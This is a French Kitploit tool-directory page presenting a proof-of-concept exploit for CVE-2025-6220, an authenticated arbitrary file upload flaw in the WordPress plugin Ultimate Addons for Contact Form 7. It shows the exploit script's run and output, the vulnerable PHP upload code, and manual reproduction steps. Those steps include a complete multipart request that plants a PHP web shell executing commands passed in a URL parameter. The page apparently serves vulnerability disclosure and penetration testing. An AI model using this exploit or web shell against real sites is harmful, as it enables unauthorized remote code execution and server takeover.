Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6220 — Ultimate Addons for Contact Form 7 <= 3.5.12 - Authentifié (Administrateur+) Téléversement de fichier arbitraire via 'save_options' | Kitploit
Outils/GitHubGitHub/d0n601/cve-2025-6220
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubd0n601/cve-2025-6220

CVE-2025-6220

Ultimate Addons for Contact Form 7 <= 3.5.12 - Authentifié (Administrateur+) Téléversement de fichier arbitraire via 'save_options'

Voir le dépôt
37il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Ultimate Addons for Contact Form 7 <= 3.5.12 - Téléversement de fichier arbitraire authentifié (Administrateur+) via 'save_options'

Le plugin Ultimate Addons for Contact Form 7 ne nettoie pas les types de fichiers dans sa fonctionnalité d'enregistrement des options, ce qui permet aux administrateurs et aux utilisateurs de niveau supérieur de téléverser des fichiers arbitraires et potentiellement d'exécuter du code sur le serveur.

TL;DR des exploits

  • Un POC CVE-2025-6220.py est fourni pour démontrer qu'un administrateur peut téléverser un web shell nommé shell.php.
root@kitploit:~
python3 CVE-2025-6220.py https://lab1.hacker admin PASSWORD

Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
70e7b99966
Uploading web shell: shell.php
{"status":"success","message":"Options saved successfully!"}
Web Shell Location: https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 61299sec preferred_lft 61299sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86240sec preferred_lft 14240sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:bd:e1:95:26 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Détails

La fonctionnalité uacf7_options_save dans /wp-content/plugins/ultimate-addons-for-contact-form-7/admin/tf-options/classes/UACF7_Settings.php traite les téléversements de fichiers sans appliquer une validation appropriée du type de fichier.

Les lignes 894-920 de la fonction save_options() vérifient la présence de $_FILES dans la requête HTTP et ne valident le type MIME que par rapport à un application/octet-stream générique. Le fichier est ensuite stocké dans un répertoire accessible via le web /wp-content/uploads/itinerary-fonts.

root@kitploit:~
$tf_fonts_extantions = array( 'application/octet-stream' );
for ( $i = 0; $i < count( $_FILES['file']['name'] ); $i++ ) {
    if ( in_array( $_FILES['file']['type'][ $i ], $tf_fonts_extantions ) ) {
        $tf_font_filename = $_FILES['file']['name'][ $i ];
        move_uploaded_file( $_FILES['file']['tmp_name'][ $i ], $tf_itinerary_fonts . '/' . $tf_font_filename );
    }
}

Reproduction manuelle

  1. Connectez-vous au panneau d'administration et rendez-vous dans Ultimate Addons -> Settings.
  2. Lancez Burp Suite ou un outil similaire et commencez à intercepter le trafic.
  3. Cliquez sur le bouton Save dans le coin inférieur droit. test1
  4. Interceptez la requête POST dans Burp et ajoutez vos propres données de fichier (assurez-vous d'utiliser les bonnes limites de formulaire).
root@kitploit:~
------WebKitFormBoundarydAJeoqdwR5qxfDb1
Content-Disposition: form-data; name="file[]"; filename="shell.php"
Content-Type: application/octet-stream

<?php
// Silence is golden
if (!empty($_GET['cmd'])) {
    echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
}
------WebKitFormBoundarydAJeoqdwR5qxfDb1--

test2

  1. Transmettez la requête et vérifiez que la réponse indique un succès :
root@kitploit:~
{"status":"success","message":"Options saved successfully!"}
  1. Accédez à https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php pour exécuter la preuve de concept. test3
Télécharger l’outil